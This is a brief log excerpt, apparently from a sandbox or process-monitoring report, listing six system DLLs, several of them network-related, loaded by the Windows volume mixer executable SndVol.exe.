Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\SysWOW64\SndVol.exe |
Section loaded: iphlpapi.dll |
|